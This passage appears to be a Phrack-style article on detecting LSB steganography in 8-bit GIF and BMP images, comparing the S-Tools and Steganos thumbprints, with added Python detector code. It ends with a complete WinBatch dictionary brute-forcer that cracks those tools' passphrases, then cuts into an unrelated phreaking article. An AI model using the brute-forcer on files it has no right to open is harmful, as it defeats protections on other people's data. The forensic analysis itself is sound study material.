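# Constructed sample: the article's container (20..27) and message (200).
CONTAINER = list(range(20, 28))
STEGO = embed_lsb(CONTAINER, int_to_bits(200, 8))    # [21, 21, 22, 22, 25, 24, 26, 26]
RECOVERED = bits_to_int(extract_lsb(STEGO, 8))       # 200

if __name__ == "__main__":
    print("container:", CONTAINER)
    print("stego:    ", STEGO, "->", RECOVERED)
    print("values changed:", changed_values(CONTAINER, STEGO))
    # A longer constructed "container" whose low bits vary stands in for
    # the LSB noise of a real sound or image file.
    noisy = [(37 * i + 11) % 256 for i in range(64)]
    hidden = embed_text(noisy, "test")
    print("text roundtrip:", extract_text(hidden, 4),
          "changed:", changed_values(noisy, hidden))
```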


II. Stego Techniques 


In an 8-bit image such as a GIF or BMP each pixel is described as a number 
from 0 - 255 which refers to an actual color in the "color lookup table" or 
palette. A common misconception is that all images simply contain strings of 
bytes that describe individual colors, and that the graphic file simply 
lists these colors in left-to-right, and top-to-bottom fashion. This is 
only partially true for 8-bit images. The palette lists every color that is 
used in the image (and extra colors, if less than 256 total colors are actually 
used in the image), and the image data itself is stored as a series of digits 
from 0 - 255 which reference an entry in the palette. In this way, the image 
can be reconstructed by performing palette lookups to determine the color to 
insert at that pixel location. 


In order to hide data within an 8-bit GIF or BMP container, most existing 
tools use one of two techniques which I will term LSB palette reference 
modification and RGB element LSB modification. 


LSB palette reference modification involves changing the LSB(s) of a 
_palette_reference_ (0 - 255) in order to hide the data contained in the 
message. Remember that a palette reference simply contains a number from 0 - 
255 which references a color, or entry, in the palette. In order to hide 
data, a program utilizing palette reference modification may decide which 
color to point to based on the color’s LSBs. This type of program will pay 
no attention to how similar the colors are, only whether or not the LSBs 
serve its purpose of data hiding. If the adjacent colors in the palette have 
dissimilar LSBs, they are well suited for data hiding and become good 
candidates for storing hidden text in the final stegoed container. If a 0 
(zero) is meant to be hidden, the stego program inserts the palette index 
reference of the color with the LSB of 0 (zero), and vice versa for hiding a 
1 (one). 


RGB element LSB modification involves modifying the pixel’s _actual_color_ 
by changing the LSB of the Red, Green or Blue elements of the color in the 
color table. For example, the color "white" is represented by the RGB values 
255,255,255 which in binary equates to: 


11111111 11111111 11111111 


listed in RGB order. By altering the LSB of each color in the RGB element, 
we can hide data by making almost identical copies of colors such that only 
the LSBs are different. Since the color is only changed by one or two LSBs, 
the resulting colors are very close, perhaps undetectable to the human eye. 
The result of this change to the colors in the table enables nearly identical 
colors to be referenced by multiple table entries. This becomes extremely 
obvious when the palette is viewed and sorted by luminance (relative 
brightness) in a product such as Paint Shop Pro. These similar colors will be 
grouped right next to each other in a luminance-sorted palette. Using this 
technique, a binary 1 in the message file can be represented in the stego file 
by replacing a color in the container file with an altered version of that 
color whose R, G or B element ends with a binary 1. Likewise, a binary 0 in the 
message file can be represented in the stego file by replacing the original 
color in the container file with an altered version of that color whose R, G or 
B element ends with a binary 0. 


III. Steganographic Thumbprints 


Several tools are available that apply these techniques to files on 
several different platforms. I will focus on two specific toolsets: Steganos 
and S-Tools v4.0. Steganos is perhaps the most versatile and powerful of the 
toolsets, while S-Tools seems to be the easiest and most widely used (not to 
mention the fact that I like S-Tools; it’s been around for a long time and 
is very well done). Other available toolsets include similar functionality 
and hiding techniques. In order to discover what the tools actually do when 
they hide data, it’s best to use a simple BMP container file. The RGB BMP 
file utilizes a palette scheme identical to that of a GIF for the purposes 
of our tests, and all the reviewed toolsets can use BMP files as containers. 


For example, consider a container image which is 50 pixels by 50 pixels and 
contains only black-colored (0,0,0) pixels. This image references palette 
entry 0 (zero) as its only color. I will use a freeware painting program, Paint 
Shop Pro V4.10 (PSP), to create and analyze the base images. When creating 
this image, PSP used a default palette with 216 unique palette entries and 40 
"filler" entries at the end of the palette, all of which contain the value 
(0,0,0) or pure black. 


Our message file is simply a text file which contains the phrase "This is a 
test..." 


A. S-Tools 


When the message file is hidden using S-Tools, the resulting 8-bit image 
appears identical to the human eye when compared to the original. However, 
there are perceptible oddities about the file which are revealed under closer 
scrutiny. 


Since S-Tools uses RGB element LSB modification as its hiding technique, 
the palette has distinct and very obvious characteristics. Many of the 
palette’s colors are offset by a single bit in the R, G or B element. This is 
very obvious when the palette is sorted by luminance (brightness) and viewed 
with PSP. The first sixteen (and only original) colors in this palette are: 


(51,1,1) (51,1,0) (50,1,0) (51,0,1) (51,0,0) (50,0,1) (50,0,0) 
(1,1,0) (1,1,0) (0,1,1) (0,1,0) (1,0,1) (1,0,1) (1,0,0) (0,0,1) (0,0,0) 


Notice that the offsets of the RGB elements are only 1 bit. This is an 
imperceptible color change, and is a very wasteful use of the palette. 
Remember, there are only 256 colors to work with. Most 8-bit image creation 
programs are very careful when deciding which colors to include in the palette, 
and almost all use standard palettes which contain all the most commonly used 
colors. To see a palette with this many _nearly_ identical colors is odd. 
Also, the palette has been adjusted to contain fewer colors. The standard 
colors selected by PSP have been replaced by some of the colors listed above. 
As is typical with this type of hiding, the slack space at the end of the 
palette has been reduced to make room for the new copies of existing colors. 
This type of hiding will always make itself obvious by using single-bit 
offsets in one or more of the LSBs. Since this type of thumbprint is so 
easily identifiable, we will concentrate our efforts on the harder-to-detect 
palette reference method used by Steganos. 


B. Steganos 


Steganos kindly reminds you that 8-bit images don’t make terribly secure 
containers. It’s a good thing, too, because when the message file is hidden 
using Steganos the resulting 8-bit image has a major anomaly: the stego 
image is completely different from the original! As opposed to an all-black 
image, the image now resembles a black-and-blue checkerboard. However, this 
difference is only obvious if you have access to the original image. Since 
an interceptor will most likely not have a copy of the original image, we 
will examine other methods of detection. When the palette of the image is 
checked for single-bit offset colors (as in the stego image created with 
S-Tools), none can be found. Also, there is no more or less slack space at 
the end of the palette than existed in the original palette. Steganos does 
not alter the palette in any way when hiding data. It uses the LSB palette 
reference technique described above. However, there are very distinctive 
ways of determining if this technique has been used to hide data, specifically 
by looking at _how_ the palette’s colors are used. In this simple case, a 
histogram will show exactly the type of modification we are looking for. 

In the words of the PSP Help documentation, 


"A histogram is a graph of image color values, typically RGB values and/or 
luminance. In a histogram, the spectrum for a color component appears on the 
horizontal axis, and the vertical axis indicates the portion of the image’s 
color that matches each point on the component’s spectrum." 


In a nutshell, this simply means a graph is generated showing how the 
color(s) are used in an image, and how similar (in shade) they are. When 
viewing the "blue" histogram for the Steganos-hidden file, we see something 
like this: 


   100 =  X         X
       -  X         X
    90 =  X         X
       -  X         X
    80 =  X         X
       -  X         X
    70 =  X         X
       -  X         X
    60 =  X         X
       -  X         X
    50 =  X         X
       -  X         X
    40 =  X         X
       -  X         X
    30 =  X         X
       -  X         X
    20 =  X         X
       -  X         X
    10 =  X         X
       -  X         X
    00 =  X         X
         -+-+-+-+-+-+-+-+-+-+-+-+-+-+
          0 1 2 3 4 5 6 7 8 9 2
          0 0 0 0 0 0 0 0 0 0 5
                              5

The X-axis shows the spectrum for the color blue (from 0 to 255). The 
Y-axis shows the number of pixels in the image that match that color. When 
displaying a histogram, the 100 on the Y axis is not a percentage, but a MAX 
value (in this case 1272) which indicates the greatest number of pixels used 
for _any_one_color_. Since there are really only two colors _used_ in this 
stego image, there are only two vertical bars. These bars indicate that in 
the Blue color family there are really only two colors used; one with a blue 
value of zero, and another with a blue value of approximately 50 (51 to be 
exact). Upon examining the color table for this image sorted in 
_palette_order_, it is evident that these two referenced colors are only 
similar in that they are placed right next to one another in the palette. The 
two colors are (0,0,0) and (0,0,51) or black and very, very dark blue. The 
image mostly has black hues, and Steganos probably picked the very dark blue 
color (00110011) as the 1 for some hidden data, and black (00000000) as the 
0 for some hidden data since these colors are _right_ next to each other in 
a palette-index-order color table listing. Although they reside next to each 
other in the palette, the colors are not very similar, which makes the final 
stego file appear discolored. Steganos does not modify any of the colors, 
but it modifies how the original palette is used by making nearly equal 
references to a color and its neighbor (when sorted by palette index). 


Bottom line: this image uses neighboring palette colors a nearly identical 
number of times. 1272 pixels were used for black and 1228 pixels were used 
for the dark, dark blue. This would not be unusual if not for the fact that 
the colors are palette index neighbors. If the designer of the image were 
using some sort of shading effect, there would be many more than just two 
shades involved in this 256 color image, and the shading offsets would be 
greater. These two colors don’t even appear as shades of one another when 
placed side-by-side. 


A skilled interceptor will know immediately that something is not quite 
right with these images. They both display typical signs of data hiding. 


IV. Real-World example 


Intercepting a single-color image and determining that it is stegoed is a 
trivial task. Increasing the number of used colors within the boundaries of 
the 256-color palette could (so the reader may think) obfuscate the hidden 
message file. However, by applying a few simple methodologies, a pattern 
emerges which can increase the odds of detecting a stegoed image. For 
example, if a two-color image is created using only the colors black (0,0,0) 
and white (255,255,255), and data is hidden in the file by using Steganos, 
the results would show that Steganos not only used black and white, but two 
more colors from the palette are used with values of (0,0,51) and 
(255,255,51) respectively. These newly-used colors adjoin the original two 
colors in the palette listing, have differing LSBs, and are referenced 
nearly as much in the new image as the original colors are. A similar 
situation evolves when a 6-color image is created. After Steganos hides the 
data, the original 6 colors and their palette neighbors will be used in 
the new file. The 6 new colors become alternate representations of the 
original 6 colors in terms of their LSBs. This methodology holds true all 
the way up to images containing 256 different colors. By understanding these 
patterns, all 8-bit Steganos images can be detected without access to the 
original image. 
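The two thumbprints described in sections III and IV, as an added detector that is not from the article, PSP or either stego tool: lsb_twin_groups finds palette entries that are identical except for the LSB of R, G or B (the S-Tools pattern), and neighbour_usage finds palette-index pairs that differ only in their index LSB and are referenced a near-equal number of times (the Steganos pattern). The palettes and pixel index lists are constructed to mirror the article's black 50 by 50 image; the 0.8 usage ratio, the even/odd index pairing and the twin-count threshold are assumptions.

```python
"""Palette thumbprint checks for 8-bit (paletted) images.

Added example, not code from the article or its tools.  An image is given as
a palette (list of (r, g, b) tuples) plus its pixel data as a flat list of
palette indices, which is what an 8-bit GIF/BMP decoder hands back.
"""
from collections import Counter, defaultdict


def lsb_twin_groups(palette):
    """Group palette entries that become identical once the LSB of each of
    R, G and B is dropped.  RGB element LSB modification (S-Tools) fills the
    palette with such twins; an ordinary palette has few or none.
    Returns one list of palette indices per group of two or more."""
    groups = defaultdict(list)
    for index, (r, g, b) in enumerate(palette):
        groups[(r >> 1, g >> 1, b >> 1)].append(index)
    return [members for members in groups.values() if len(members) > 1]


def neighbour_usage(indices, ratio=0.8):
    """Find palette-index pairs (2k, 2k+1), the two indices that differ only
    in their LSB, that are both referenced and used a near-equal number of
    times.  Assumption: a hidden bit selects one of the two, so their counts
    track each other.  Returns (even, odd, count_even, count_odd) tuples."""
    counts = Counter(indices)
    hits = []
    for even in sorted(i for i in counts if i % 2 == 0):
        count_even, count_odd = counts[even], counts.get(even + 1, 0)
        if count_odd and min(count_even, count_odd) / max(count_even, count_odd) >= ratio:
            hits.append((even, even + 1, count_even, count_odd))
    return hits


def thumbprint_report(palette, indices, twin_threshold=8, ratio=0.8):
    """Run both checks and give a verdict per hiding technique."""
    twins = lsb_twin_groups(palette)
    pairs = neighbour_usage(indices, ratio)
    return {
        "lsb_twin_groups": twins,
        "rgb_element_lsb_suspect": sum(len(g) for g in twins) >= twin_threshold,
        "neighbour_pairs": pairs,
        "palette_reference_suspect": bool(pairs),
    }


# Constructed sample 1: a palette holding every LSB variant of (50,0,0) and
# of (0,0,0), the pattern the article reports after S-Tools hiding.
STOOLS_PALETTE = [(50 | r, g, b) for r in (0, 1) for g in (0, 1) for b in (0, 1)] \
               + [(r, g, b) for r in (0, 1) for g in (0, 1) for b in (0, 1)]
STOOLS_INDICES = [0] * 2500                     # 50 x 50 pixels, one colour

# Constructed sample 2: an untouched palette whose index 0 (black) and index 1
# (very dark blue) are used 1272 and 1228 times, as in the article's histogram.
STEGANOS_PALETTE = [(0, 0, 0), (0, 0, 51), (0, 0, 102), (0, 0, 153), (255, 255, 255)]
STEGANOS_INDICES = [0] * 1272 + [1] * 1228

# Constructed sample 3: the same palette used the way a drawn image would use
# it; neighbouring indices are not referenced a near-equal number of times.
BENIGN_INDICES = [0] * 1000 + [1] * 100 + [2] * 900 + [3] * 500

if __name__ == "__main__":
    for name, pal, idx in (("S-Tools-like", STOOLS_PALETTE, STOOLS_INDICES),
                           ("Steganos-like", STEGANOS_PALETTE, STEGANOS_INDICES),
                           ("benign", STEGANOS_PALETTE, BENIGN_INDICES)):
        print(name, thumbprint_report(pal, idx))
```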


When attempting to detect the use of steganography in 16 or 24-bit images, 
a great deal of pattern analysis must be used. 24-bit stego detection is not 
for the faint of heart, but it can be done. Standard "randomization" solutions 
fall quite short of solving this problem since LSB data in image creation 
programs is hardly random. It follows a pronounced pattern when viewed as a 
part of a whole: an 8-bit number. Most standard graphics effects do not use 
random data, they use patterns to create and maintain a certain graphic 
illusion. Inserting "random" data, even at the LSB level can become fuel for 
the analyst’s fire. In many 24-bit stego programs, bits in the secret text 
are generally inserted with average spacing between them, then random "noise" 
is added to make the secret bits seem less obvious. The random "noise" would 
(should!) have a random interval between differing bits. The contrast of an 
average spacing against random spacing may be enough to not only alert an 
analyst, but to point out where secret bits start and random bits begin. The 
bottom line is that 24-bit detection is doable, just not practical for an 
amateur (yet!). 


V. The Future 


Steganography is in its infancy, but several new technologies are emerging 
including selection and construction methods of data hiding and continuing 
research in the area of random distribution. 


Selection involves the generation of a large number of copies of the same 
container file that differ slightly. In the case of an image file, you may 
make minor adjustments in hue, saturation and RGB levels to the end that your 
secret message will eventually _appear_ in the LSBs of the data! Although 
difficult to generate, this type of data hiding is nearly impossible to detect 
since the image’s characteristics are not altered at all. 


Construction simply involves modeling the characteristics of the original 
container when creating your message. In simplest terms, mold your message 
around the existing container instead of molding the container to your message. 
If, for example the original image were left unchanged, and a key was 
developed to create the message _from_ the image, detection would be impossible 
without the key. 


Several advances are being made in the area of random distribution, 
specifically by Tuomas Aura at the Helsinki University of Technology. His 
paper "Practical Invisibility in Digital Communication" presents a technique 
called "pseudorandom permutation", which brings steganography up to the 
technical level of cryptography and properly addresses the issue of 
randomness from a data hiding perspective. His paper is excellent reading 
and can be found at http://deadlock.hut.fi/ste/ste_html.html 


Interesting research (and proof-of-concepts) are being done to utilize 
stego techniques in reserved fields in TCP, UDP and ICMP packets. This 
research proves that steganography has merit and application beyond sound and 
image files. Unfortunately, using stego where there was nothing before (i.e. 
within typically blank reserved fields) can raise a flag in and of itself. Use 
encryption and compression to further protect data. It really doesn’t matter 
if the secret data is discovered if the underlying crypto is secure. 


VI. Conclusion 


Detecting stego in an 8-bit image is fairly easy. Actually gaining access 
to the secret text becomes a bit harder, yet a simple, overlooked method involves 
bruteforcing the creating application (see S_BRUTE.WBT program below). On the 
other hand, 24-bit image analysis requires quite a bit of work. If you choose 
to employ data hiding techniques, use 24-bit images and compress and encrypt 
your message file, bearing in mind that 24-bit images can raise flags simply 
due to their size. 


When attempting to identify stego files in 8-bit images, keep in mind the 
following pointers: 


* Search for the obvious thumbprint of RGB element LSB modification in the 
  stego file: single-bit offsets between colors in a palette sorted by 
  luminance (this SCREAMS S-Tools!). 
* If no single-bit offsets exist between the colors in the palette, search 
  for Palette Reference thumbprints which include the following: 
  * Use of palette index neighbors a near-equal number of times either in the 
    entire image (use a histogram) or in an area which should be primarily 
    single-color only but contains a checkerboard effect (use zoom 11:1 to see 
    individual pixels, and the eyedropper tool to quickly view the RGB 
    elements in PSP). 
  * Poor image quality (noise and snow are common side-effects). 
  * For more detailed analysis the reader might consider using an MS-DOS 
    program msgifscn.zip, available from Simtel mirror sites worldwide, to 
    dump the entire contents of an 8-bit GIF image’s palette to a file, which 
    can be dumped into MS Excel for analysis (the analysis add-in for Excel 
    comes in REAL handy for binary conversions and data sorts.) 
* If you have a clue that the file you’re looking at may contain stegoed 
  data, it never hurts to brute force the application that created it! (see 
  the S_BRUTE program listing at the end of this article) While this may be 
  one of the slower methods of breaking stego, it is often easier to 
  derive possible keyphrases from other sources than attacking the stego 
  algorithm or the crypto. 


VII. The program 


The author of S-Tools sells the source code for his program, and Steganos 
makes available an SDK for hiding/decoding files using its algorithms, but 
an option exists for programs that do not make their source available: 
bruteforce of the application itself. Although using the API and SDKs 
available would be significantly faster, there are times when this option 
just may not exist. 

To that end, included below are two files, S_BRUTE.WBT and S_BRUTE.INI. 
This program was written in WinBatch, which is a language that acts very much 
like the UNIX language TCL/TK (or Expect), but operates in a Windows 95/NT 
context. Developed to control Windows applications, WinBatch provides a 
perfect vehicle for brute-forcing an application’s password function (see 
http://www.windowware.com for the free compiler to run S_BRUTE). 


S_BRUTE is an application that will bruteforce S-Tools v4 and Steganos using a 
dictionary file in an attempt to determine the passphrase of a stegoed image 
(which will subsequently reveal the hidden text). The program selects which 
tool to use based on which executable you select, and the S-Tools portion of 
the program will not only bruteforce the passphrase, but will attempt all 
four algorithms available to S-Tools. Unfortunately S-Tools uses certain 
mouse-only operations, so you will effectively lose your mouse while the 
S-Tools portion runs. The dictionary needed by this program is simply a list 
of words or passphrases separated by newlines. Keep in mind that Steganos 
does not allow passwords shorter than five characters, so strip those out to 
save time. If you need to use a " (double-quote) in the word/passphrase, 
simply use "" (two double quotes) in the dictionary. WinBatch likes this. A 
log file is created as c:\output.txt which simply lists all the attempted 
words/passphrases. The output file can be reused as a dictionary since no 
extraneous information is written out. 


Two options exist for inputting the names of the Stego tool executable, 
the dictionary file and the stego image. The S_BRUTE.INI file format (see 
below) allows the variables exepath, dict and stegofile which allow the input 
of these full path names into the program. In addition, the program can 
prompt for the filenames manually using standard Windows ’95 file boxes. In 
this case, pay attention to the box titles as they come up. These titles 
describe what file the program is looking for. A variable is also available 
in the INI file called STEGANOSDELAY. This value (listed in seconds) 
determines how long to wait for a passphrase error message from Steganos. 
The default is 0, but if you get a lot of false positives (your machine is 
SLOW!) set this value to a few seconds. 


Due to the speed of the bruteforce attack, this program is not always accurate 
as to which word actually worked if it finds a match. In this case, S_BRUTE 
will tell you which word it _thinks_ worked, but you may have to try the word 
S_BRUTE gave you plus one or two of the previous words in c:\output.txt (plus 
a few different algorithms if you’re using S-Tools). Either way, you are only 
looking at about 12 combinations (not bad!). Note that S-Tools and/or Steganos 
must be properly installed prior to using this program. S_BRUTE was not 
designed to brute force the entire keyspace, but to give you a faster method 
of determining the passphrase if you have any idea what it might be. If the 
stego image is found on a web page, create a dictionary from words and 
phrases found on that site, and let S_BRUTE do the work for you. 
<++> sbrute/S_BRUTE.WBT
; Steganography Brute v1.0 written by a researcher at hacklab.com
; For new versions and support programs see http://www.hacklab.com
; This little toy brute forces two very common Steganography utilities,
; specifically Steganos (http://www.steganography.com) and S-Tools written
; by Andrew Brown (a.brown@nexor.co.uk)
; This program can be run using a free program called WinBatch
; from http://www.windowware.com
;
;
; Notes:
;
; 1) The program depends on the executable name being either "S-TOOLS.EXE" or
;    "STEGANOS.EXE". This exe name decides many things, including the
;    semantics of the brute force attack and which types of container files
;    to accept. (Remember that the tools accept different types of container
;    files.)
; 2) The dictionary file is simply a text file with words or phrases separated
;    by CR(LF). If a " (double quote) must be used in the word or phrase,
;    use "" (two double quotes) instead. This is WinBatch's way of representing
;    the double quote in a string.
; 3) Internally, this program converts all Windows LFN-formatted dir/filenames to
;    DOS-style 8.3 or short dir/filenames. If you have problems finding/using
;    LFN files, you may want to manually convert them to a SFN dir/file structure.
; 4) The S-Tools test requires certain mouse-only operations. During this part of
;    the program, it's best to leave your machine alone. Otherwise the mouse will
;    be all over the place. Sorry.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
:main
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
IntControl(12,4,0,0,0)                  ;; controls abrupt endings

START_TIME=TimeYmdHms()                 ;; set early so bail_error can always report a duration

if (WinMetrics(-4) < 4)
   error="This program runs on Windows NT or Windows '95 only!"
   gosub bail_error
endif

cr=Num2Char(13)
lf=Num2Char(10)
crlf=StrCat(cr,lf)
progname="Steganography Brute"
STEGANOS=0                              ;; Flag for Steganos
STOOLS=0                                ;; Flag for S-Tools

text1="This program brute forces Steganography programs."
text2="Including S-Tools v4.0 and Steganos. Do you wish"
text3="to continue?"
q=AskYesNo("%progname%","%text1% %crlf% %text2% %crlf% %text3%")
if (q == @NO) then exit

text1="It is easiest to make all file settings through the"
text2="S_BRUTE.INI file in this directory. If you do not use"
text3="this file, you will be manually prompted for the files."
text4="Do you wish to use the INI file?"
q=AskYesNo("%progname%","%text1% %crlf% %text2% %crlf% %text3% %crlf% %text4%")

if (q == @NO) then gosub prompt_for_files
else gosub set_files

if (STEGANOS)
   gosub steganos
else
   if (STOOLS) then gosub stools
endif

error="Passphrase not found!"
gosub bail_error
exit

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
:steganos
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Run("%exepath%","%stegofile%")

WinWaitExist("",10)                     ;; Steganos' first window has no title.
                                        ;; If you have problems,
SendKeysTo("","{ENTER}")                ;; comment out these two lines...
; TimeDelay(10)                         ;; and uncomment...
; SendKey("{ENTER}")                    ;; these two lines.
WinWaitExist("Steganos for Windows 95",30)
SendKeysTo("Steganos for Windows 95","{ENTER}")

dictgrip=FileOpen("%dict%","READ")
fn1="c:\output.txt"
handleout=FileOpen("%fn1%","APPEND")
stitle="Steganos for Windows 95"
START_TIME=TimeYmdHms()

word=0
while (word != "*EOF*")
   word=FileRead(dictgrip)
   if word=="" then continue
   if word=="*EOF*" then break

   ClipPut("%word%")
   SendKeysTo(stitle,"^v{ENTER}")       ;; paste the candidate and submit it
   TimeDelay(STEGANOSDELAY)
   test=StrSub(MsgTextGet(stitle),1,22)
   if test==""                          ;; no error dialog appeared: probable match
      text1="I think we have a match!"
      text2="Due to the speed of the brute force attack, check c:\output.txt"
      text3="to see the last few words used, but I think the passphrase is:"
      text4="%word%"
      success="%text1% %crlf%%text2% %crlf%%text3% %crlf%%text4%"
      gosub bail_success
   else
      if test=="This password is wrong"
         SendKeysTo(stitle,"{ENTER}")
         SendKeysTo(stitle,"!B{ENTER}")
         FileWrite(handleout,"%word%")
      endif
   endif
endwhile

STOP_TIME=TimeYmdHms()
FileClose(dictgrip)
FileClose(handleout)
return

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
:stools
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Run("%exepath%","%stegofile%")

if (WinWaitExist("Welcome to S-Tools",5) == @TRUE)
   SendKeysTo("Welcome to S-Tools","!C")
endif

WinPlace(0,0,400,400,"~S-Tools")
WinWaitClose("Please Wait")
SendMenusTo("~S-Tools","Window Tile Horizontally")

text1="S-Tools requires certain mouse-only operations."
text2="After clicking OK, position the mouse within your"
text3="image in the S-Tools window and click the left button."
Message("Setup mouse for S-Tools","%text1% %crlf% %text2% %crlf% %text3%")

while (MouseInfo(4) != "4")             ;; wait for a left click, remember where
   magic=MouseInfo(2)
endwhile

magicx=ItemExtract(1,magic," ")
magicy=ItemExtract(2,magic," ")

dictgrip=FileOpen("%dict%","READ")
fn1="c:\output.txt"
handleout=FileOpen("%fn1%","APPEND")
START_TIME=TimeYmdHms()

word=0
while (word != "*EOF*")
   word=FileRead(dictgrip)
   if word=="" then continue
   ClipPut("%word%")
   ;; write to the output file
   if word!="*EOF*"
      if (FileWrite(handleout,"%word%") > 0)
         error="Unable to open file %fn1%."
         gosub bail_error
      endif
   endif
   for dumnum=1 to 4                    ;; for all the algorithms
      MouseMove(magicx,magicy,"","")
      MouseClick(@RCLICK,0)
      SendKeysTo("~S-Tools","r")
      SendKeysTo("~Revealing","!P^v!V^v!E")
      if (dumnum==1) then SendKeysTo("~Revealing","I")   ;; IDEA
      if (dumnum==2) then SendKeysTo("~Revealing","D")   ;; DES
      if (dumnum==3) then SendKeysTo("~Revealing","T")   ;; DES3
      if (dumnum==4) then SendKeysTo("~Revealing","M")   ;; MDC
      SendKeysTo("~Revealing","{ENTER}")
      ;childlist=WinItemChild("~S-Tools")
      numchilds=ItemCount(WinItemChild("~S-Tools"),@TAB)
      if (numchilds>2)                  ;; a revealed file opens a new child window
         text1="We have an extra window in S-Tools! Possible passphrase match."
         text2="Due to the speed of the brute force attack, check c:\output.txt"
         text3="to see the last few words used, but I think the passphrase is:"
         text4="%word%"
         success="%text1% %crlf%%text2% %crlf%%text3% %crlf%%text4%"
         gosub bail_success
      endif
   next
endwhile

FileClose(dictgrip)
FileClose(handleout)
return

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
:set_files
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
fname=IniReadPvt("Main","exepath",".\S-TOOLS.EXE",".\S_BRUTE.INI")
gosub path_clean
exepath=fname
gosub determine_tool_type

fname=IniReadPvt("Main","dict",".\DICT.TXT",".\S_BRUTE.INI")
gosub path_clean
dict=fname

fname=IniReadPvt("Main","stegofile",".\STEGO.GIF",".\S_BRUTE.INI")
gosub path_clean
stegofile=fname
STEGANOSDELAY=IniReadPvt("Main","STEGANOSDELAY","0",".\S_BRUTE.INI")

gifname=ItemExtract(ItemCount("%stegofile%","\"),"%stegofile%","\")
return

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
:prompt_for_files
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
msg="Enter the Steganos error delay 0-60"
STEGANOSDELAY=AskLine("%progname%",msg,"0")

types="Dictionary Text Files|*.txt|All Files|*.*|"
dict=AskFileName("Select Dictionary Filename","C:\",types,"dict.txt",1)
dict=FileNameShort(dict)

types="Steganography tool Executable|*.exe|"
msg="Where is the S-Tools or Steganos executable?"
exepath=AskFileName(msg,"C:\",types,"",1)
exepath=FileNameShort(exepath)
gosub determine_tool_type

if (STEGANOS)
   types="Stego File (with hidden message)|*.bmp;*.dib;*.voc;*.wav;*.txt;*.html|"
else
   types="Stego File (with hidden message)|*.gif;*.bmp;*.wav|"
endif

text1="Select Stego Filename (containing hidden message)"
stegofile=AskFileName("%text1%","C:\",types,"",1)
stegofile=FileNameShort(stegofile)

gifname=ItemExtract(ItemCount("%stegofile%","\"),"%stegofile%","\")
return

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
:path_clean
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
switch FileExist(fname)
   case 0
      error="File %fname% not found!"
      gosub bail_error
      break
   case 2
      error="File %fname% in use!"
      gosub bail_error
      break
endswitch
fname=FileNameShort(fname)
return

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
:determine_tool_type
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
exename=StrUpper(ItemExtract(ItemCount("%exepath%","\"),"%exepath%","\"))
if (exename == "S-TOOLS.EXE") then STOOLS=1
else if (exename == "STEGANOS.EXE") then STEGANOS=1
return

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
:bail_error
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
STOP_TIME=TimeYmdHms()
Message("%progname% Error!","%error%")
SECONDS=TimeDiffSecs(STOP_TIME,START_TIME)
Message("%progname%","Finished in %SECONDS% seconds.")
exit

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
:bail_success
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
STOP_TIME=TimeYmdHms()
Message("%progname% Success!!!","%success%")
Message("%progname%","Time Started: %START_TIME%%crlf%Time Finished: %STOP_TIME%")
exit
<-->

<++> sbrute/S_BRUTE.INI
[Main]
EXEPATH="C:\Program Files\Deus Ex Machina\Steganos\Steganos.exe"
DICT="C:\win\desktop\dict.txt"
STEGOFILE="C:\win\desktop\steclouds.bmp"
; STEGOFILE="C:\win\desktop\s-tclouds.gif"
STEGANOSDELAY=0      ;; Set this higher for false positives.
                     ;; (Steganos does not use different names for its
                     ;; Windows, so this program makes negative result
                     ;; checks (ie bad passwords) based on an error dialog.
                     ;; This timeout controls how many seconds to wait for
                     ;; an error. Default=0
<-->


---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 09 of 


-------[  On the Morality of Phreaking 


--------[  Phrack Staff 


The issue of phone phreaking is an interesting topic for 
discussion concerning morality. For those not familiar with this 
topic, I will give a brief outline of the subject. Following the 
outline of phreaking, I will analyze the issue of whether 
phreaking as defined in the outline is a morally right act, from 
the perspective of John Stuart Mill and Immanuel Kant. Finally, 
I will address the fallacies of each of the arguments they might 
present concerning the topic and provide a determination of which 
stands as the superior argument for this subject. 


